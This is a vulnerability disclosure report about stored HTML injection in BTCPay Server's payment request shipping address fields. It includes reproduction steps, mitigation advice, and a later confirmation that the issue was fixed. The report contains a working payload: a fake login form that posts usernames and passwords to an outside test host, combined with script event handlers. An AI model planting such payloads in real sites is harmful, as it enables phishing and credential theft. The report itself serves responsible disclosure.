Stored HTML Injection inside the >>> Request payment >>> Request Customer Data Checkout >>> Request shipping address in btcpayserver/btcpayserver
Feb 20th 2023
I hope you are all doing well.
*. I wanted to bring to your attention a potential vulnerability on the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
*. During my research, I discovered that the five plus fields are vulnerable to a stored HTML injection attack inside the >>> Request payment >>> Request Customer Data Checkout >>> Request shipping address in https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
Proof of Concept:
*. I have created a video demonstration of the vulnerability and uploaded it to my Google Drive.
*. The link for the video is provided below for your review:
*. Go to the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests
*. Click payment request.
*. Request new payment.
*. Remember to enable the >>> Request customer data on checkout >>> Request shipping address.
*. Create the payment request.
*. Now click view, we/user need to enter the address and other stuff.
*. Use the following HTML payload in the below fields:
buyerName buyerAddress1 buyerAddress2 buyerCity buyerZip buyerState buyerCountry
<html><body><head><meta content="text/html; charset=utf-8"></meta></head> <div style="text-align: center;"><form Method="POST" Action="http://www.test.com/"> Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br /> <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" /> <br /></form></div></body></html> <input><input"/onmouseover="confirm(1);//“onload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>
*. Save this information.
*. Now, cancel payment and move on to the payment request and click edit data.
*. Check that request shipping address part were stored and rendered the html injection.
*. That's the issue.
*. Restrict special characters and HTML encode attributes in the input fields.
*. Use regular expressions or other techniques to detect and reject malicious input.
*. Avoid embedding user input into emails unless necessary and always HTML-encode user input before embedding it into emails.
*. Implement proper input validation and sanitization measures to prevent this type of vulnerability from occurring in the future.
*. Stored HTML injection with credentials capturing can have serious negative impacts on both individuals and organizations.
*. This type of attack involves injecting malicious code into a website's database, which can then be retrieved and displayed to unsuspecting users. If the injected code captures login credentials, it can allow an attacker to gain unauthorized access to sensitive information or even take control of user accounts.
*. The impact of such an attack can be significant, including financial loss, reputational damage, and legal consequences.
*. For individuals, stored HTML injection with credentials capturing can result in identity theft or the compromise of personal and financial information.
*. For organizations, it can lead to the theft of sensitive data, disruption of services, and loss of customer trust.
*. To prevent this type of attack, it is important for website developers to follow secure coding practices and implement security measures such as input validation and encryption.
*. It is also crucial for users to be vigilant and use strong, unique passwords and to never reuse passwords across multiple accounts.
Hope you are doing well on your end. :)
Upon inspection, it appears that a fix for the HTML injection vulnerability in the payment request forms has been implemented.
And I am pleased to confirm that I am no longer able to reproduce the issue.
I want to express my heartfelt appreciation for your prompt action in fixing the HTML injection vulnerability in our payment request forms. Your quick response and dedication to ensuring the security of our system are truly commendable. Thank you for your hard work and commitment to keeping our system safe and secure.
@maintainer I'm curious about the process for assigning a CVE and what the next steps are regarding the resolution of this issue. Could you provide more information on what needs to be done in order to assign a CVE, and what actions will be taken moving forward to ensure that the vulnerability is fully addressed?
We released yestersday: https://github.com/btcpayserver/btcpayserver/releases/tag/v1.8.0